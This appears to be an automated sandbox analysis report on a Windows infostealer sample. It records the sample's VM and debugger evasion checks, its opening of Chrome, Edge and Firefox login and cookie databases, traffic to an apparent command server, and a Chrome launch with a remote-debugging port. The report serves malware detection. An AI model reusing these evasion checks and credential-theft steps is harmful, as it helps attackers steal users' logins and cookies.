Source: 95e1Fwp61u.exe, 00000000.00000003.1735041108.0000000007D80000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: SYSINTERNALSNum_processorNum_ramnameallfreedriversNum_displaysresolution_xresolution_y\*recent_filesprocessesuptime_minutesC:\Windows\System32\VBox*.dll01vbox_firstSYSTEM\ControlSet001\Services\VBoxSFvbox_secondC:\USERS\PUBLIC\public_checkWINDBG.EXEdbgwireshark.exeprocmon.exex64dbg.exeida.exedbg_secdbg_thirdyadroinstalled_appsSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallSOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall%d%s\%sDisplayNameapp_nameindexCreateToolhelp32Snapshot failed.
Source: Amcache.hve.13.dr Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.13.dr Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.13.dr Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: 95e1Fwp61u.exe, 00000000.00000003.1764123776.0000000002132000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2161361520.000001B0D9FA8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: Amcache.hve.13.dr Binary or memory string: vmci.sys
Source: 95e1Fwp61u.exe, 00000000.00000003.1735041108.0000000007D80000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: SYSTEM\ControlSet001\Services\VBoxSF
Source: Amcache.hve.13.dr Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.13.dr Binary or memory string: vmci.syshbin`
Source: Amcache.hve.13.dr Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.13.dr Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.13.dr Binary or memory string: VMware20,1
Source: Amcache.hve.13.dr Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.13.dr Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.13.dr Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.13.dr Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.13.dr Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.13.dr Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.13.dr Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.13.dr Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.13.dr Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.13.dr Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.13.dr Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: C:\Users\user\Desktop\95e1Fwp61u.exe System information queried: ModuleInformation Jump to behavior
Source: C:\Users\user\Desktop\95e1Fwp61u.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging

barindex
Source: C:\Users\user\Desktop\95e1Fwp61u.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\Desktop\95e1Fwp61u.exe Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\95e1Fwp61u.exe Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\95e1Fwp61u.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\95e1Fwp61u.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\95e1Fwp61u.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\95e1Fwp61u.exe Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\95e1Fwp61u.exe Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\95e1Fwp61u.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\95e1Fwp61u.exe File opened: NTICE
Source: C:\Users\user\Desktop\95e1Fwp61u.exe File opened: SICE
Source: C:\Users\user\Desktop\95e1Fwp61u.exe File opened: SIWVID
Source: C:\Users\user\Desktop\95e1Fwp61u.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\95e1Fwp61u.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\95e1Fwp61u.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_00B48230 LoadLibraryA,GetProcAddress,FreeLibrary,GetLastError, 8_2_00B48230
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_00B4116C Sleep,Sleep,SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv,_amsg_exit,_initterm,GetStartupInfoA,_cexit,_initterm,exit, 8_2_00B4116C
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_00B411A3 Sleep,SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv, 8_2_00B411A3
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_00B41160 Sleep,SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv, 8_2_00B41160
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_00B413C9 SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv,_amsg_exit,_initterm, 8_2_00B413C9
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C1584D0 cpuid 8_2_6C1584D0
Source: C:\Users\user\Desktop\95e1Fwp61u.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Source: C:\Users\user\Desktop\95e1Fwp61u.exe Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\95e1Fwp61u.exe Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\95e1Fwp61u.exe Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\95e1Fwp61u.exe Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\95e1Fwp61u.exe Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\95e1Fwp61u.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\95e1Fwp61u.exe Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\95e1Fwp61u.exe Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\95e1Fwp61u.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
Source: 95e1Fwp61u.exe, 00000000.00000003.1735041108.0000000007D80000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: procmon.exe
Source: Amcache.hve.13.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.13.dr Binary or memory string: msmpeng.exe
Source: 95e1Fwp61u.exe, 00000000.00000003.1735041108.0000000007D80000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: wireshark.exe
Source: Amcache.hve.13.dr Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.13.dr Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

barindex
Source: Yara match File source: 8.2.service123.exe.6c0d0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: Process Memory Space: service123.exe PID: 6828, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
Source: global traffic TCP traffic: 192.168.2.4:49731 -> 185.121.15.192:80
Source: C:\Users\user\Desktop\95e1Fwp61u.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db Jump to behavior
Source: C:\Users\user\Desktop\95e1Fwp61u.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Users\user\Desktop\95e1Fwp61u.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\95e1Fwp61u.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\95e1Fwp61u.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite Jump to behavior
Source: C:\Users\user\Desktop\95e1Fwp61u.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior

Remote Access Functionality

barindex
Source: C:\Users\user\Desktop\95e1Fwp61u.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default"
Source: Yara match File source: dump.pcap, type: PCAP
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs